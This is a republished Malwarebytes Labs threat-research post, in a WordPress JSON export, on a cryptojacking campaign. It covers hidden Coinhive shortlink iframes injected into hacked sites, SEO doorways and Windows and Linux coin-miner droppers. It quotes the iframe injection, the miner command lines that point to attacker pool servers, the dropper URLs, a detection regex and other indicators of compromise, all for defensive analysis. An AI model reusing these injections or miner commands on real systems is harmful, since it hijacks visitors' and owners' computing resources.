{"id":12727,"date":"2018-07-03T08:10:03","date_gmt":"2018-07-03T16:10:03","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/07\/03\/news-6495\/"},"modified":"2018-07-03T08:10:03","modified_gmt":"2018-07-03T16:10:03","slug":"news-6495","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/07\/03\/news-6495\/","title":{"rendered":"Obfuscated Coinhive shortlink reveals larger mining operation"},"content":{"rendered":"

Credit to Author: J\u00e9r\u00f4me Segura| Date: Tue, 03 Jul 2018 15:00:00 +0000<\/strong><\/p>\n

During the past several months, in-browser mining has continued to affect a large number of websites, predominantly relying on Coinhive’s infamous API. We documented several campaigns on this blog, in particular Drupalgeddon<\/a>, where attackers are taking advantage of vulnerabilities in popular Content Management Systems (CMS) to compromise websites and push payloads both client- and server-side.<\/p>\n

In the past weeks, our crawlers have catalogued several hundred sites using a variety of CMS all injected with the same obfuscated code that uses Coinhive’s shortlink to perform silent drive-by mining<\/a>. By pivoting on this indicator of compromise, we were able to identify a larger infrastructure receiving traffic from several thousand hacked sites acting as doorways to redirect traffic to a central server involved in the distribution of both web and standard malware coin miners.<\/p>\n

\"\"<\/a><\/p>\n

Figure 1: Mining operation fueled by compromised sites<\/em><\/p>\n

Obfuscated miner injection<\/h3>\n

As part of our regular crawls, we look for known redirects to sites of interest and lately, most have been related to Coinhive domains. We detected hundreds of new domains, all legitimate websites that were injected with a blurb of hexadecimal code. Once decoded, it shows as an invisible iframe (1×1 pixel) to cnhv[.]co\/3h2b2<\/em>.\u00a0We believe it is part of the same campaign that was exposed by the folks over at Sucuri<\/a> at the end of May.<\/p>\n

<i frame src=\"https:\/\/cnhv[.]co\/3h2b2\" width=\"1\" height=\"1\" align=\"left\"><\/i frame><\/pre>\n
\"\"<\/a><\/p>\n
Figure 2: A WordPress site injected with an obfuscated iframe loading Coinhive’s API<\/em><\/p>\n
The cnhv[.]co domain name is used for what Coinhive calls shortlinks<\/a>, essentially a way of monetizing on hyperlinks by making visitors’ browsers solve a certain number of hashes before they reach their destination site. When clicking on such a link, you will see a progress bar and within a few seconds, you will be redirected. Crooks are abusing this feature by loading those shortlinks as hidden iframes with an unreasonably high hash count.<\/p>\n
\"\"<\/a><\/p>\n
Figure 3: Shortlink is taxing our CPU at 100%\u00a0<\/em><\/p>\n
In Figure 3 where we made the iframe visible by by changing its dimensions, to show that rather than wait for a few seconds before being redirected, users will unknowingly be mining for as long as they stay on the page. Indeed, while Coinhive’s default setting is set to 1024 hashes, this one requires 3,712,000 before loading the destination URL.<\/p>\n
Backdoor initiated redirection<\/h3>\n
Querying urlscan.io<\/a>, we were able to find the same Coinhive key active as early as May 7<\/a>\u00a0via a different redirection mechanism. There is a specific URI pattern indicating that hacked sites are being leveraged to perform a redirect to a server at 5.45.79[.]15<\/strong>. This in turn creates a redirection via another crafted URI where one of the parameters is the referrer site, ultimately leading to the Coinhive shortlink that will start the web miner.<\/p>\n
\"\"<\/a><\/p>\n
Figure 4: The same shortlink was found loaded from a compromised website via an intermediary server<\/em><\/p>\n
Several sites have been injected with both<\/em> the hidden cnvh[.]co iframe method, as well as via backdoors:<\/p>\n
\"\"<\/a><\/p>\n
Figure 5: A hacked site injected with Coinhive’s shortlink and multiple compromised URLs<\/em><\/p>\n
The URI pattern used for the redirections can be identified by the following regular expression:<\/p>\n
\"\"<\/a><\/p>\n
Figure 6: A regular expression showing a match between compromised sites<\/em><\/p>\n
Blackhat SEO and doorways<\/h3>\n
Looking at those URIs again, we can note the presence of certain keywords that appear to be Search Engine Optimization (SEO) related, for instance:<\/p>\n
cctvvietnam[.]com\/1hqg\/wzdea.php?lrscye=mongodb<\/span><\/strong>-count<\/span><\/strong>-fields<\/span><\/strong>  pixelbedlam.co[.]uk\/9ul8\/6nfme.php?lrscye=relativity<\/span><\/strong>-software<\/strong><\/span>-cost<\/span><\/strong>  valam[.]in\/f8wb\/z8d6w.php?lrscye=tutoring<\/span><\/strong>-in<\/span><\/strong>-egypt<\/strong><\/span>  stemat[.]pl\/klwy\/dzwfy.php?lrscye=vin<\/span><\/strong>-decoder<\/span><\/strong>-mercedes<\/span><\/strong>  whylab[.]nl\/podd\/1hwnz.php?lrscye=gpon<\/span><\/strong>-home<\/span><\/strong>-gateway<\/span><\/strong>-exploit<\/span><\/strong>  soho-dom[.]ru\/el5p\/ywuul.php?lrscye=bts<\/span><\/strong>-album<\/span><\/strong>-download<\/span><\/strong>-zip<\/span><\/strong><\/pre>\n
We confirmed that indeed some Google or Bing searches showed us results that included the list of compromised sites that are acting as “doorways,” usually to a traffic distribution system or redirector (5.45.79[.]15). In this case, the doorways are used to trick people into downloading malicious coin miners<\/a> instead of the file they were looking for.<\/p>\n
\"\"<\/a><\/p>\n
Figure 7: Despite appearances, this file is not 100 percent clean<\/em><\/p>\n
Note how the server at 5.45.79[.]15 is performing the redirection to another hacked sited (motoir[.]com<\/em>), where the keywords passed from the URI are dynamically used to create what looks like a unique download page and file.<\/p>\n
\"\"<\/a><\/p>\n
Figure 8: Web traffic showing the redirection sequence<\/em><\/p>\n
Malicious coin miners<\/h3>\n
Upon execution, this executable will unpack the following three binaries:<\/p>\n
    \n
  1. winsystem.exe<\/strong>: the XMRig miner<\/li>\n
  2. clock.exe<\/strong>: .bat file wrapped into an EXE contains commands<\/li>\n
  3. netflash.exe<\/strong>: a very simple downloader, written in .NET.<\/li>\n<\/ol>\n
    The batch script adds persistence by setting a registry entry, kills certain processes (possible miners already running), and starts mining by launching:<\/p>\n
    winsystem.exe -B -a cryptonight -o 37.1.197[.]121:80 -p x -u %COMPUTERNAME% +500 --max-cpu-usage=30 --donate-level=1 -k<\/pre>\n
    \"\"<\/a><\/p>\n
    Figure 9: Batch script revealing the mining code<\/em><\/p>\n
    The fake download binaries are based on the same code from a miner, unsurprisingly, hosted at 5.45.79[.]15\/xxxphoto.exe<\/em>.\u00a0Using VirusTotal Intelligence, we were able to expand on this infrastructure and identify another coin miner, which is an ELF file this time, based on this cnrig library<\/a>, hosted at: 5.45.79[.]15\/monero\/cnrig<\/em>.<\/p>\n
    \"\"<\/a><\/p>\n
    Figure 10: Graph showing an ELF and Win32 miner hosted on the same server<\/em><\/p>\n
    A comment left on this\u00a0VirusTotal report page<\/a> indicates that this miner was found on an infected server and pulled down from a PHP backdoor called\u00a0zz1.php<\/strong><\/em>. Searching for that file name, we located a possible candidate<\/a> uploaded to a public site. Decoding the Base64 encoded strings, we can assert with greater confidence that this is the malicious PHP file used by the attackers to download the Linux coin miner from\u00a05.45.79[.]15\/monero\/cnrig<\/em>:<\/p>\n
    \"\"<\/a><\/p>\n
    Figure 11: PHP code uploaded into compromised sites responsible for ELF miner download<\/em><\/p>\n
    Once it has retrieved the ELF binary, it runs it, using the following command in order to begin mining:<\/p>\n
    .\/cnrig -o 5.61.46[.]146:80 --donate-level=1 > \/dev\/null 2>&1  <\/pre>\n
    Proxies<\/h3>\n
    Because the miners are connecting to private pools (and likely via proxy) without using a wallet address, we cannot assess how much money the perpetrators have generated with this scheme.<\/p>\n
    In fact, the server at 5.45.79[.]15 also has its own ProxyPanel<\/a>:<\/p>\n
    \"\"<\/a><\/p>\n
    Figure 12: A proxy based on\u00a0xmrig-proxy<\/span><\/em><\/p>\n
    The XMRig version of the miner had a public stats page indicating that there were close to 500 infected machines that had participated in the mining activity. For the CNRig version, we weren’t able to find any such stat, although the number of hacked servers was much higher.<\/p>\n
    A growing number of sites<\/h3>\n
    The interest surrounding cryptocurrencies has drastically changed the malware landscape with criminals hoping to get a piece of the action. As such, a growing number of websites are being compromised both client- and server-side to distribute and run coin miners.<\/p>\n
    In this campaign, we see infrastructure used to push an XMRig miner onto users by tricking them into downloading files they were searching for online. In the meantime, hacked servers are instructed to download and run a Linux miner, generating profits for the perpetrators but incurring costs for their owners. Finally, it seems only fitting to see an abuse of Coinhive’s shortlinks to perform in-browser mining.<\/p>\n
    Malwarebytes<\/a> blocks malicious mining, whether it is triggered by malware or loaded via compromised websites.<\/p>\n
    Thanks to @DynamicAnalysis<\/a> for sharing additional information.<\/em><\/p>\n
    Indicators of compromise<\/h3>\n
    String for obfuscated cnvh[.]co injection<\/p>\n
    vhisduhvuhiusdhfbjhewvhisdhbybguyebrrfsd<\/pre>\n
    Coinhive shortlink<\/p>\n
    cnhv[.]co\/3h2b2<\/pre>\n
    Coinhive site key<\/p>\n
    Dkpy5v4CBgwZqzPRosdHKDB7DQsc1Sav<\/pre>\n
    Regex for compromised sites redirection<\/p>\n
    \/(w{4}|w{8})\/(w{5}|w{9}).php?([a-z]{6}|[a-z]{3})=[w]{1,25}-[w]{1,25}<\/pre>\n
    Redirection server<\/p>\n
    5.45.79[.]15<\/pre>\n
    Windows miner dropper<\/p>\n
    5.45.79[.]15\/xxxphoto.exe  38f55239519523638dc2b3958f5e9951a6b04f813336927a4f7de717518e5b44<\/pre>\n
    Linux miner<\/p>\n
    5.45.79[.]15\/monero\/cnrig  c890d18fe3753a9ea4d026fc713247a9b83070b6fe40539779327501916be031<\/pre>\n
    The post Obfuscated Coinhive shortlink reveals larger mining operation<\/a> appeared first on Malwarebytes Labs<\/a>.<\/p>\n
    https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
    Credit to Author: J\u00e9r\u00f4me Segura| Date: Tue, 03 Jul 2018 15:00:00 +0000<\/strong><\/p>\n\n\n\n
    <\/a><\/td>\n<\/tr>\n
    A web miner injected into compromised sites is just the tip of the iceberg for an infrastructure hosting malicious Windows and Linux coin miners.<\/p>\n
    Categories: <\/p>\n